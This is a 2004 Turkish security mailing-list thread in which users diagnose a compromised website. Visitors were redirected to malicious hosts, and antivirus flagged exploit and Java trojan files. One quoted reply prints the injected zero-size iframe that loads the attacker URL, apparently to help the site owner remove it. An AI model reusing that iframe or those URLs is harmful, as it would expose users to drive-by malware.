From: Serkan ATEŞ (serkanates@armafiltre.com.tr)
Date: Fri 15 Oct 2004 - 12:09:47 EEST
Belki çözüme yardımcı olur düşüncesiyle www.cozumteknik.com adresine
bağlandığımda karşılaştıklarımı aktarmak istedim...
System : Windows 2000 Pro
Browser : internet explorer 6.0.2800.1106
Antivirus : norton
Sayfaya bağlandıktan sonra istem dışı yönlendirilen adresler sırasıyla
http://www.splitinfinity.info/fa/?=get...
http://213.159.117.133/dl/adv121.php...
Esas problem neden bu adrese yönlendirildiğimiz olduğu için ilgili
olmamasına rağmen tespit etmişken onları da yazayım :)yönlendirildiğimiz
sayfalardan gelen virusler...
------------------------------------
MHTMLRedir.Exploit
File: \Temporary Internet Files\Content.IE5\9Y7ZYOPA\adv121[1].php
------------------------------------
Virus name: Bloodhound.Exploit.10
File: \Temporary Internet Files\Content.IE5\F5M0YZ9Y\t3[1].htm
------------------------------------
Virus name: Bloodhound.Exploit.6
File: \Temporary Internet Files\Content.IE5\F5M0YZ9Y\x[1].htm
------------------------------------
Virus name: Trojan Horse
File: \Temporary Internet Files\Content.IE5\XN2W06UF\exploit[1].htm
------------------------------------
Virus name: Trojan Horse
File: \Temporary Internet Files\Content.IE5\EPIJ1QNF\fuck[1].htm
------------------------------------
Virus name: Trojan.ByteVerify
File: Application Data\Sun\Java\Deployment\cache\javapi\v1.0\file\
GetAccess.class-56a40b77-33f53c45.class
------------------------------------
Virus name: Trojan.ByteVerify
File: Application Data\Sun\Java\Deployment\cache\javapi\v1.0\file\
Dummy.class-72862645-31b8a56e.class
------------------------------------
Virus name: Trojan.ByteVerify
File: Application Data\Sun\Java\Deployment\cache\javapi\v1.0\file\
InsecureClassLoader.class-608f560c-637effb1.class
------------------------------------
Sevgilerimle...
-----Original Message-----
From: linux-guvenlik-bounces@liste.linux.org.tr
[mailto:linux-guvenlik-bounces@liste.linux.org.tr] On Behalf Of Ugur
Sent: Friday, October 15, 2004 11:37 AM
To: linux-guvenlik@liste.linux.org.tr
Subject: Re: Windos'a yine virüs bulaşmış (Eskikonu : RE: [Linux-guvenlik]
redhat 9'a virus bulasmis.)
On Friday 15 October 2004 11:13, Cem Kamil Kulekci wrote:
> Devrim GUNDUZ wrote:
> > On Fri, 15 Oct 2004, enginaar© wrote:
> >> Evet Saroz-life.com'a bende baktim bi problem cikmadi da
> >> www.cozumteknik.com
> >> veya www.netdizayn.net adreslerine bi bakabilirsin. Bi de sayfaya
> >> girdiginde
> >> altta status barda yazan adreslere dikkat edebilirsin. Bana da bu olay
> >> sikayet olarak geldi. Sizin server'daki domainlere girdigimde norton
> >> virus
> >> var diyor dediler. Sizin bilgisayarda vardir bisey dedim. Ben de
> >> sistemimin
> >> temiz olduguna eminim. Bi kac siteye girdim, problem cikmadi ama
> >> cozumteknik.com a girdim, hemen exploit mexploit biseyler dedi.
>
> Evet olay ie ile alakalı ama sanırım onun dışında bişeyler var. örneğin
> kodlara bakarsanız
>
> <title>
> cozumteknik.com
> </title>
>
> <iframe src="http://www.splitinfinity.info/fa/?d=get" width=0
> height=0></iframe> <style> * { font-family: verdana; font-size: 10pt;
> COLOR: gray; }
> b { font-weight: bold; }
>
>Ben kodlara baktığımda böyle bir şey göremedim.Firefox ile bağlandığımda
herhangi bir sorun yok.Tabii ki linux üzerinde.Ayrıca konu dışı ama sayfa
başlığındaki "bizlgisayar" kısmını düzeltin.İyi çalışmalar...
Uğur
>
> bölümünü görebilirsiniz. bu frame'i hemen kodlarınızdan kaldırın.
> (kodlara ie ile bakmayın bazen bu tip kodları atlayabiliyor mozilla
> kullanabilirsiniz.) netdizayn.net ile ilgili herhangi bir sorun
görünmüyor.
>
> Kolay gelsin
>
> Cem.
>
> _______________________________________________
> Linux-guvenlik mailing list
> Linux-guvenlik@liste.linux.org.tr
> http://liste.linux.org.tr/mailman/listinfo/linux-guvenlik
_______________________________________________
Linux-guvenlik mailing list
Linux-guvenlik@liste.linux.org.tr
http://liste.linux.org.tr/mailman/listinfo/linux-guvenlik